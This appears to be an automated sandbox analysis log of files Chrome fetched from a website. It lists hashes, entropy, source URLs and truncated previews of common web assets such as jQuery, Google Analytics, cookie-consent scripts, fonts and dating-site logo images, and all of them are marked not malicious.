                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:TZVAf6V7uck2UQYU/kWW/pijrC74Bh4BWjLpPikHHsZO1UkpfX:TZif6V6cjUQYU/kWWg/CMBqBWRTE4fX
                                                                                                                                                                                                                                                                                MD5:D3E6F20ED54713AB6D53941FA2FAAE0C
                                                                                                                                                                                                                                                                                SHA1:ACEFBD32229D7C907C80BE075F6B24E9864884EE
                                                                                                                                                                                                                                                                                SHA-256:4978BAB6B8CE7938415CFBBD1AEAF96E5D00AC99282D8BE41F7F61797F81552A
                                                                                                                                                                                                                                                                                SHA-512:190D9D4445A6492CEFC3E488A8F8D22B953C19C246F179B16C93701A1E4D25DC4E654EB60F2952724C9BBE7E4F3DE969C210515D3877618731DFD88448FFC41A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://assets.squarespace.com/universal/scripts-compressed/async-gdpr-cookie-banner-0ca3659314a26eea17bb-min.en-US.js
                                                                                                                                                                                                                                                                                Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[84467],{159393:(_,a)=>{"use strict";Object.defineProperty(a,"__esModule",{value:!0}),a.default=void 0;var t;(function(r){r.SUB_FOOTER="SUB_FOOTER",r.PILL="PILL",r.HIDDEN="HIDDEN"})(t||(t={}));var s=t;a.default=s,_.exports=a.default},418891:_=>{_.exports={"2a55ca78e8124468fd12f5631b591477":"Cookie banner","5c9e9d0cbf6046deb40eaa0a5c1722df":"These cookies provide quantitative measures of website visitors. With the usage of these cookies we are able to count visits and traffic sources to improve the performance of our site.","5d34f2ee7358fc231e5c0fb44bb6194d":"Close","67db752e6310686617e98c22c85b3963":"Necessary","6bf1c5ed97ddc6828e7cd5159df2a240":"Performance and Analytics","74472054366bb6c5316e7afadad1093e":"These cookies are used by advertising companies to serve ads that are relevant to your interests.","7f55fe8fa38cccf52495082b8a3b514e":"Required to enable core site functionality and to remember user preferences a
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 750 x 466, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):601277
                                                                                                                                                                                                                                                                                Entropy (8bit):7.991850463420538
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:12288:Iv7kgsP5Gb8mH6vxeKxpUCv2UeNDWWPr3V9gbNVr:ZzxGotv0KzUCv2HDWMXghVr
                                                                                                                                                                                                                                                                                MD5:74197863524931C2E818F9E057E112AC
                                                                                                                                                                                                                                                                                SHA1:F6A829972282EDBDA8B5AA6A8295E692C6973BB5
                                                                                                                                                                                                                                                                                SHA-256:B6C6C0556BFC84905669C12A5F8529F400E4FA11EA5205F54454606299B835CB
                                                                                                                                                                                                                                                                                SHA-512:CC57C0D6AA1F4063904263D0EC80207672782A9E8EDEF934C6E535559447E2F9AE72C9B828CA6FCCFCF122DAB69F75A80E03CAFD67906632D0CBEC32A37D357A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://images.squarespace-cdn.com/content/v1/65ddde819292aa47ed2c6d1d/03b0fd77-d50c-4741-84f9-65afe3436291/zoosk.png?format=750w
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............MN.....pHYs............... .IDATx...K.$I...S5s....z.sz....].fV..$(......H.EH.(..G...p.W^..x.g.....f........wwUefD..*.j....dHWg.G......_.&........Q...v.......?......1.[....=.... qI`..".....rw.=...Y...o.p........I...Z.>^...5.S..k.{...;.< .. ...+.t....{....d.,..~......Q....m....$UD......"*d.DS..C..r.[....FZO<(.f..../....+.".O@e...)....q...m:..Sj.X+g.s..[(..I..).s&..g.......%..n`............6E.7N...F...s..z..p......w....7.=....o\=....]N.......9.O.BN......+.<.!...[...^.|..|.7.|vk.<.y..R.,+..T8......O//yzq..+..^.7_Q_. ..P.F.....9......./O....N.q.1#.ru....W....O.;..".yRo.\.7.Vp.r...../_|.o.y.....&....K.a...r.[.........~.x<..:.......2.n..|..'.._.........$'.42=z.o.....]...m..8.O.|...............i7....................q.n...j"....(..i...'..y.g.._...._......nnO.;.n..w......=~..o0......|.j..t.<...V../..._..7_Q.3...n..#..)..."..?........?{.WO9......./U.u....L9...'.?../....~.K~....:.;..>..;$QJ9Qk...+.y.....0N...'.....
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (554)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):184562
                                                                                                                                                                                                                                                                                Entropy (8bit):5.629007297098108
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:B57rVrIIJLjJkPCmgev/fZ64PATDEBBaNCuclzoS/XBCy4y7kh6GUCWB1R20rNTa:B57rVrIIJLjJkeevnZ64PA/uaNCuclc1
                                                                                                                                                                                                                                                                                MD5:BB161E955A3C970CDD870A4EC0BD6D7F
                                                                                                                                                                                                                                                                                SHA1:125E1DA1CD7BF3BBFEB22D24D8D8CCF70800D71A
                                                                                                                                                                                                                                                                                SHA-256:FB4171324646676906D68D37FC0E678AAF5655E0A910D565CBCA48771B727506
                                                                                                                                                                                                                                                                                SHA-512:B4052D4A5CE7CF80F9C5EE4E3960F7B18F0F4E2B347B4D740E0B03F52362488E60A4853498377CFD4E86E53FE6992B9F067F79EAFAC0435D7CD212637FEB861A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:google.maps.__gjsload__('util', function(_){/*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var jwa,iwa,lwa,nwa,owa,pwa,qwa,swa,cE,eE,fE,uwa,jE,wwa,kE,ywa,lE,Awa,zwa,Bwa,Cwa,Dwa,Ewa,Fwa,Gwa,Hwa,Iwa,Jwa,Kwa,Lwa,Mwa,Nwa,Owa,Pwa,Qwa,Rwa,Swa,Twa,pE,Wwa,rE,Xwa,Ywa,Zwa,$wa,axa,bxa,cxa,dxa,exa,fxa,gxa,ixa,kxa,mxa,oxa,qxa,sxa,uxa,wxa,yxa,Axa,Bxa,Cxa,Dxa,Exa,Fxa,Gxa,Hxa,sE,Ixa,Jxa,Kxa,Lxa,Mxa,Nxa,Pxa,uE,vE,Qxa,Rxa,Sxa,Txa,Uxa,Vxa,Wxa,Xxa,Yxa,Zxa,$xa,wE,aya,xE,bya,cya,dya,eya,fya,gya,hya,yE,iya,zE,jya,kya,lya,mya,nya,oya,pya,qya,rya,sya,tya,uya,vya,wya,xya,yya,zya,Aya,Bya,Dya,Eya,Fya,Hya,BE,Iya,Jya,.Kya,Lya,Mya,Nya,Oya,Qya,Rya,Sya,Wya,Xya,Zya,bza,cza,dza,eza,YE,ZE,$E,aF,cF,iza,dF,jza,eF,fF,gF,hF,iF,kza,lza,mza,oza,pza,jF,qza,nza,tza,uza,nF,yza,Cza,Dza,Eza,Fza,rF,Gza,Iza,Jza,Kza,Lza,uF,Nza,Tza,BF,Wza,Vza,CF,IF,Yza,Zza,$za,bAa,cAa,cG,eAa,dG,fAa,gAa,hAa,iAa,fG,kAa,jAa,lAa,nAa,pAa,rAa,vAa,tAa,wAa,uAa,gG,hG,zAa,AAa,iG,jG,BAa,DAa,lG,mG,CAa,FAa,oG,pG,GAa,qG,HAa,sG,tG,IAa,uG,vG,JAa,wG,P
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):3
                                                                                                                                                                                                                                                                                Entropy (8bit):1.584962500721156
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:P:P
                                                                                                                                                                                                                                                                                MD5:8A80554C91D9FCA8ACB82F023DE02F11
                                                                                                                                                                                                                                                                                SHA1:5F36B2EA290645EE34D943220A14B54EE5EA5BE5
                                                                                                                                                                                                                                                                                SHA-256:CA3D163BAB055381827226140568F3BEF7EAAC187CEBD76878E0B63E9E442356
                                                                                                                                                                                                                                                                                SHA-512:CA4B6DEFB8ADCC010050BC8B1BB8F8092C4928B8A0FBA32146ABCFB256E4D91672F88CA2CDF6210E754E5B8AC5E23FB023806CCD749AC8B701F79A691F03C87A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
                                                                                                                                                                                                                                                                                Preview:{}.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 42616, version 1.0
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):42616
                                                                                                                                                                                                                                                                                Entropy (8bit):7.994774657302207
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:768:sCLKndwLdsHEvFV0KovT+FZHnWc7Y+rteiNDKxjMXJJI4LizLs8txQ/fuTBFz:snuLdsHEXovCr9hdcQX1iLsIQ/fU
                                                                                                                                                                                                                                                                                MD5:57716E51419E5143F8E1DD061D5CF8C2
                                                                                                                                                                                                                                                                                SHA1:D796688A0F3679B0536787315EE0386649C146AB
                                                                                                                                                                                                                                                                                SHA-256:B1128ADB79C7208D410630C04FE6E8AC8886AEB778AAFB3F4195FE735ACC1D89
                                                                                                                                                                                                                                                                                SHA-512:BCC76E2AF4B718DB7799F4C2D15A2A4AEB7F5C6FF391560597780368EA59D8633B2E187E0A175BD5A59A97E8A44C93ABD078E4C41987B0A5B5325FCC40A714A4
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://fonts.gstatic.com/s/asap/v30/KFO9CniXp96a4Tc2DaTeuDAoKsE615hJW34.woff2
                                                                                                                                                                                                                                                                                Preview:wOF2.......x......rt.................................*..X?HVAR.8.`?STAT.N'...2/l.....(.......0..T.6.$.... .....I..[s[Q.l.E)..,...\..m..6...YRt.v;....yf..F.1.....jY.=I...VA.J-.'D.[`.r".K+c..N;.4...h..h.....=g..1..zM..=.r..M...fy.......x,.Ea5\^UO..:...+....Wq.1...]...H.GT.:.W.....#.z..<...@+....m...|.EJA@.6..b.X..s..S.X..."WW.t..v......g...?..*..yf..,....S.Q.wb.-=..................Q=...Rx$B.P.m....Id.gHgU.-..J.*A...ds.i...9. .|W........|.0...8@s...z,o.....m....E3...RA,....A...L...o._..x...z.I....DB......i...E.......%.9-.-..:v..v.E...I....4.....p....1F..H/.6..ft..@0....m ...J.".v.....O..8......0.SO.L.(yo.....O...^<.@.m.ni......{......\>i....c".P...W3..L..H.x.K.e|...v.X}@..`^3J.3.L..{...........z...b..`At.}.Y...&..i...%.Zn..J.........s.cf..S.O..FXu....~M=.....7<..........w.mN.=n.i...@6........e7@y.$...= (..$.a.hd9$m... .m..,Hyf9.dyc8..S....=........p..S...jI...6.Z..N.....{j_..d...x7.[.......R.j..0Z)......z.k.B!?...3F.Ek...G....2.).t.q.B.s7.@....{U.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (22462)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):22463
                                                                                                                                                                                                                                                                                Entropy (8bit):5.308411760782321
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:n83CmwWtdvD5ABwXCQ+3rpheTJ8eMAB6LxbnmcY2Jo7pJ:ndmw0D5ABwXGdheTJHexzeJ
                                                                                                                                                                                                                                                                                MD5:01D681C49BE80A4B603C59E89B87920C
                                                                                                                                                                                                                                                                                SHA1:5A75464EF4E504564DB1D39BEBED538F564B770E
                                                                                                                                                                                                                                                                                SHA-256:EFAD755939E511F2BC1FEB0D58D6014006E8598A4D431F27A66DD59E14FC19CB
                                                                                                                                                                                                                                                                                SHA-512:9579D6E8FFFB1E6D343974693C7AB06A04ACE91FD2D80782E3D3ACE8566C60493FC3AC4FCCECE8A2B79D24ABDC183019D4EF86DEB18FAC86CDF49F24A7B1FDED
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:var OneTrustStub=function(t){"use strict";var a,o,l=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.vendorsServiceData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.domPurifyScriptName="otDomPurify.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:"",stateName:""}};(g=v=v||{})[g.Days=1]="Days",g[g.Weeks=7]="Weeks",g[g.Months=30]="Months",g[g.Years=365]="Years",(g=i=i
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 750 x 466, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):336119
                                                                                                                                                                                                                                                                                Entropy (8bit):7.993604367546234
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:6144:DZM0R8vQOe08RBYlrkkl9uAHsNK5iuFHFB2Lpe6Ft+rVmu/DrG0:1VIQHnOkyuAMyiulKF+wqG0
                                                                                                                                                                                                                                                                                MD5:17D732C4E37403FF3E507C0075AB58E4
                                                                                                                                                                                                                                                                                SHA1:8E7BB992D2F9ABB9972A0D6123F48BDEE5B1C6F8
                                                                                                                                                                                                                                                                                SHA-256:978CFB162775FFB0D4B17D7155E2B6D4E71B85AD8E51B7CA24D118E48F8FBC4A
                                                                                                                                                                                                                                                                                SHA-512:525E1D11190A3BCF0DE3EEA876B3B17014FBB320FB9B6BD91E3F7EF84DCB521EEA7B851F327B74DF89381C59C16101D6A7E574319AF1FEED0D6C9AE265944BB0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://images.squarespace-cdn.com/content/v1/65ddde819292aa47ed2c6d1d/a479b71c-1ac9-4e7e-bfbd-ad99febdb960/Christian-Mingle.png?format=750w
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............MN.....pHYs...........~... .IDATx...&Ir.....NwO...\r.KQ.E@2%A............~.d.a.~......l?..o~..`..).$DQ..p..3.s.{..}U.[Fe.....s.9..s......Edd.]....a=..........B..o.....l~..}...D............2).2s.[.....R.O....._..._.-<>:E!)...tQ...i....5M...J6{.A... .Tj.L.(D ..I.Mhz.g..`0.C) ...I.we.[]D{O.}GI.{..^....d..4.P.z..F.A .*.T..6..7.`..Hj.E.o.ib....$.....@......A.u...<.>I..6.o.x....../$).r...Ty.9\y...dc-...Py.P.;.......gz.v..o.....G.&.6.3.../.';.-...0....:..d4.^[..x|....,].....;.,...y..[....X...B..=fn.u..Y=...?...,#.9.6zA.K.e.E./...\...K..U.:.DU..J.|.j.-...S...OX.po....1C..7..b....K._9..d3....~..nJ)4ioiMxq .&jF`w....J/..[=V.0..L.&....%G.4MUp..$.k.f..,...e....J.....g...........PT.z#...P..*.t*3..G....~*..2..*Q.......<.....OP&..&...Q.......xj."..........2......T7.".*..B- ..LN..g...z]..#..`.l|*]an(h.%<.v.l..F.M.3.....Q.pD./...H.R.uN.<4...3m7...i..........eo...T.Y..Ff.:6.l.U...^.'....e.\.h-..jyk....).....Z.VB>Fu8X.h...[x.y2..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):52916
                                                                                                                                                                                                                                                                                Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                                                                                MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                                                                SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                                                                                SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                                                                                SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                                                                                                Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 750 x 466, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):531253
                                                                                                                                                                                                                                                                                Entropy (8bit):7.994626581713174
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:12288:1TbYNVQIf8byKxumTnDDn4bdf7mHGCUFZ4:tbYFUbyKZDni7K
                                                                                                                                                                                                                                                                                MD5:50BF7F5DECD33408DE0A16CC681377EF
                                                                                                                                                                                                                                                                                SHA1:13670A2A891372D9AAA13A6C9D772E7F194BAF25
                                                                                                                                                                                                                                                                                SHA-256:E967910D6AFCB8867E33F975859A9211084E56D68A395A27EEBD845A93F5C86E
                                                                                                                                                                                                                                                                                SHA-512:5FB1A258250FAB622C44BAAAF81ABB75D164208F8F2BC6FDDC4409EC2D4FF846067345AD87ED12F64EEA4922E8A5C7EBF05132B0958EA69117ABC9369DE2A4A2
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://images.squarespace-cdn.com/content/v1/65ddde819292aa47ed2c6d1d/137f96f5-56ba-4576-88ab-9b0999060379/EliteSingles_0.png?format=750w
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............MN.....pHYs............... .IDATx..Y.mIv..e....w.[]..c..[%...nk.Y22..n. .. ...B~......0/...p`..<.@.;$....0D...K.,..[..5....{..!.....}...Z.......+Wf....s...L....Z.h....3......9..O..!@....e|..\..C... ..}z..T.}.Ep~H......h...s..6.R&UG..(..'+........s.EGc...y..LJ,.[...|...W."6.-...B@.;.B.sw.%.>.)..R*:O...i.!.....w|Q.....R*.Oy...'...P.!_T..o..wL.)........1fIK)#..............!';N.B.h. .....''+J35'......u.h.G..,{.L...P.....A@8.(.E....^8'E.VI.........t....>.....%m...r....A+H!#..<..~.ku.....!.TT...o.s}....t<.c..*..w}..mNG....%.....Bt...)M.r...U.b..GZ..<...G..1m.0.........)....0.0..2..?..8...;...=N.....h.6i..Qk....Z?l...Ld...............o|c.-....B.m.6.....!....Z.GGj.._......g.~..B.......A....Fp...B.<E...7...A.y...}u.....)..wS0...m..n.>.`?.....wlx.7sX..tw.(.P..`.a.Q......>..M.!P.2.=.....!@6%..h.1..C..<.)$...m....!.<.0C:).....m.^./;Z..k.Q...W.........!.Y .....D.X....E.........r.........B.m...3.....urU.=GCk.........N..X9..e
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (12943), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):12943
                                                                                                                                                                                                                                                                                Entropy (8bit):5.197434517262163
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:Ie8sHDZ/J+oHewgOQGp/GJ3eYE3kfn3GVqv0s+pfYm03pYg:Ie8s1/J+oHlgOXhzYE3kf3wqv0s+pfYH
                                                                                                                                                                                                                                                                                MD5:5BC2B1FA970F9CECB3C30C0C92C98271
                                                                                                                                                                                                                                                                                SHA1:7C6BB87AAA24714B7B3B3C86DD932736A80270A9
                                                                                                                                                                                                                                                                                SHA-256:1060091178CBD6C843B802F516F230F1A3A1E85F1AFBD6EF84D80E5430BA457E
                                                                                                                                                                                                                                                                                SHA-512:1B39C7152E6561C6108A36E5B89A635CE1EF883EF683B4FB4E58D32BF2A7F415FB1DF4695562D2E8ACD85A3BF5933071294D5A1D162993930A5DC7851B9A5ED3
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";const e=e=>Math.abs(parseInt(e,10)),t=(e,t)=>{const a=new Map([["init","init"],["validation_failed","invalid"],["acceptance_missing","unaccepted"],["spam","spam"],["aborted","aborted"],["mail_sent","sent"],["mail_failed","failed"],["submitting","submitting"],["resetting","resetting"],["validating","validating"],["payment_required","payment-required"]]);a.has(t)&&(t=a.get(t)),Array.from(a.values()).includes(t)||(t=`custom-${t=(t=t.replace(/[^0-9a-z]+/i," ").trim()).replace(/\s+/,"-")}`);const n=e.getAttribute("data-status");return e.wpcf7.status=t,e.setAttribute("data-status",t),e.classList.add(t),n&&n!==t&&e.classList.remove(n),t},a=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},n=e=>{const{root:t,namespace:a="contact-form-7/v1"}=wpcf7.api;return r.reduceRight(((e,t)=>a=>t(a,e)),(e=>{let n,r,{url:o,path:c,endpoint:s,headers:i,body:l,data:d,...p}=e;"string"==typeof s&&(n=a.repl
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 513 x 217, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):10817
                                                                                                                                                                                                                                                                                Entropy (8bit):7.907401925858262
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:TmmfNa7v1TitOl/MKf6OmVCQe9ZaysjOEtd+CzNy3o8KRMtU2drf:SmUb1Trf6dze99qf1y3XEM/db
                                                                                                                                                                                                                                                                                MD5:E70ED789483D895FBBA9CF1E1A412A3F
                                                                                                                                                                                                                                                                                SHA1:E392527544CEA5FD09D4DD08BA4E7FD31C5A3C12
                                                                                                                                                                                                                                                                                SHA-256:90E384F1882556FC4473EBF352357BD82A104B0645E1A9A0FC2DA96135267E10
                                                                                                                                                                                                                                                                                SHA-512:BDAC99149E04E630E3684746F1DC8DFC29A471D221E2897550B9F9B2F9C9692761BFE00CCB83BE56663CFC47D430D5ACF5E97658240102369F06BEFDE985F973
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.....................pHYs...#...#.x.?v.. .IDATx..=r......:.Z1..D.X.^A..]...^....^..N]...)UYY.&T......Z.,. .. y.f4..E@".\.....!..C..~...b.N..eh........mw..B.!v.. ..Bz.E.!...S(..!...B.@.!.....B.!..P..B.!=."..B..)....BHO.. ..Bz.E.!...S(..!...B.@.!.....B.!..P..B.!=."..B..)....BHO.. ..Bz.E.!...S(..!...B.@.!.....B.!..P..B.!=."..B..)....BHO.. ..Bz.E.!...S(..!...B.@.!.....B.!..P..B.!=."..B..)....BHO.. ..Bz.E.!...S(..!...B.@.!.....B.!..P..B.!=."..B..)....BHO.. ..Bz.E.!...S(..!........c8.....eXoO........|...!....0...... ...@...9.F...@. ..Q...].._....L..H.v........N...k....lP.|._#||.V..rW...4j.. ..K..........Zv..l4.....?K.B..A..?..8..e8....._S.p.!._.B^;=..-.\..}.".u...nQ....u.|.<.e..i...j.d[&(..>.....P..|3zM..A,.~AD.u..~....Jf.. 33...".O..8..I...hN\.a....y.,...e.%.....?.p.3}.....=.G.%....~w......y....s..q8..`_..!.\^....A.(..K....B....~X.`.Z.N..+.N=o.-Z.. .{..Nu....)d........u.........I.....50]B&..~.4bA..P.m[.4.R..pG...... .ln.7.....f....T......'Qc.#j..t.e
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65451)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):88145
                                                                                                                                                                                                                                                                                Entropy (8bit):5.291106244832159
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:yTExXUZinxD7oPEZxkMV4SYKFMbRHZ6H5HOHCWrcElzuu7BRCKKBEqBsojZlOPma:ygZm0H5HO5+gCKWZyPmHQ47GKe
                                                                                                                                                                                                                                                                                MD5:220AFD743D9E9643852E31A135A9F3AE
                                                                                                                                                                                                                                                                                SHA1:88523924351BAC0B5D560FE0C5781E2556E7693D
                                                                                                                                                                                                                                                                                SHA-256:0925E8AD7BD971391A8B1E98BE8E87A6971919EB5B60C196485941C3C1DF089A
                                                                                                                                                                                                                                                                                SHA-512:6E722FCE1E8553BE592B1A741972C7F5B7B0CDAFCE230E9D2D587D20283482881C96660682E4095A5F14DF45A96EC193A9B222030C53B1B7BBE8312B2EAE440D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JPEG image data, progressive, precision 8, 1500x931, components 3
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):92229
                                                                                                                                                                                                                                                                                Entropy (8bit):7.950199240139791
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:73YqKbfsOT4ngJwo/EQZPtoq00A335m1+MBKn/31PyGhOdbgiu28YEcBbZle6ZRy:TadwozZPt7E3J6+W2/31P3huML28AZaj
